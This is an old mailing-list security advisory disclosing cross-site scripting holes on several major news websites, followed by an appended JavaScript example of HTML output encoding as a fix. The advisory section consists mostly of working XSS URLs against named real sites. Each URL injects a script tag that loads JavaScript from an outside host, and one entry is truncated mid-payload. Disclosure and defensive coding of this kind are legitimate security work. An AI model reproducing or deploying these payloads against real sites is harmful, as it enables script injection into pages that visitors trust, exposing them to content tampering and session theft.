Subversion of Information Vulnerabilities on Major News Sites

From: Jeremiah J. Jacks (jerat_private)
Date: Fri Mar 08 2002 - 10:24:31 PST


    Point Blank Security Notice
    Friday, March 08, 2002
    
    Title:    Subversion of Information Vulnerabilities on Major News Sites
    Advisory: PBS0302002
    
    Author:   Jeremiah Jacks, Point Blank Security
    
    Summary:  http://www.cert.org/advisories/CA-2000-02.html
    
    Disclaimer:
     This information is provided "AS IS". Point Blank Security and the
     author of this document disclaim all warranties, express and implied,
     with regard to this information. This information is provided only for
     legitimate security analysis purposes. Point Blank Security and the
     author do not condone the unauthorized access of systems, and
     specifically prohibits the use or reproduction of this information
     for such purposes. In no event shall Point Blank Security or the author
     be liable for any damages whatsoever arising out of or in connection
     with the use or dissemination of this information. Any use of this
     information is at the user's own risk.
    
    Exploitation:
    
    LA Times
     01)
    http://latimes.com/search/lat_all.jsp?Query=
    urity.com/css/latimes.js></script>
     Credit: Jeremiah Jacks
    
    NY Times
     01)
    http://www.nytimes.com/corrections.html?pagewanted="><script>document.writel
    n('<script');document.writeln('src=http://pointblanksecurity.com/css/nytimes
    .js><\/script>');</script><a+href="
     Credit: Jeremiah Jacks
    
    Newsbytes
     01)
    http://www.newsbytes.com/cgi-bin/udt/mlm.user.register?client.id=newsbytes&e
    mail.address="><script>function+Chr(code){return+String.fromCharCode(code);}
    document.writeln('<script');document.write('src');document.write(Chr(61));do
    cument.write('http://pointblanksecurity.com/css/newsbytes.js><\/script>');</
    script><a
     Credit: Jeremiah Jacks
    
    The Washington Post
     01)
    http://www.washingtonpost.com/ac3/ContentServer?pagename=world/worldsearch&C
    OUNTRY=<script+src=http://pointblanksecurity.com/css/washpost.js></script>
     Credit: Jeremiah Jacks
    
    More Examples At: http://www.pointblanksecurity.com/css/
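
The URLs above carry markup in a query parameter that the site writes back into its page. As an added example (not part of the original advisory), the sketch below shows HTML-encoding the value at output for both an attribute and a text context. The hosts, templates and function names are assumptions.

```javascript
// Added example. Hosts and markup are constructed; only the parameter names
// (pagewanted, COUNTRY) and the payload shapes come from the advisory.
const SAMPLE_ATTR =
  'http://news.example.invalid/corrections.html?pagewanted=' +
  '"><script+src=http://example.invalid/x.js></script><a+href="';
const SAMPLE_BODY =
  'http://news.example.invalid/search?COUNTRY=' +
  '<script+src=http://example.invalid/x.js></script>';

// Decode one query parameter as a form handler would ('+' becomes a space).
function getParam(url, name) {
  return new URL(url).searchParams.get(name) ?? '';
}

// Encode the characters that can close an attribute value or open a tag.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical templates: one echoes the value into an attribute, one into text.
const attrTemplate = (v) => `<input name="pagewanted" value="${v}">`;
const bodyTemplate = (v) => `<p>No results for ${v}</p>`;

// Count opening tags in a fragment; more than the template's own means
// the parameter changed the page structure.
function countOpenTags(html) {
  return (html.match(/<[a-z]/gi) || []).length;
}

function demo() {
  const attr = getParam(SAMPLE_ATTR, 'pagewanted');
  const body = getParam(SAMPLE_BODY, 'COUNTRY');
  return {
    attrUnsafeTags: countOpenTags(attrTemplate(attr)),            // input + script + a
    attrSafeTags: countOpenTags(attrTemplate(escapeHtml(attr))),  // input only
    bodyUnsafeTags: countOpenTags(bodyTemplate(body)),            // p + script
    bodySafe: bodyTemplate(escapeHtml(body)),
  };
}

console.log(demo());
```

Encoding `"` is what keeps the attribute case closed; escaping only `<` and `>` would still let the value end the attribute early.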
    


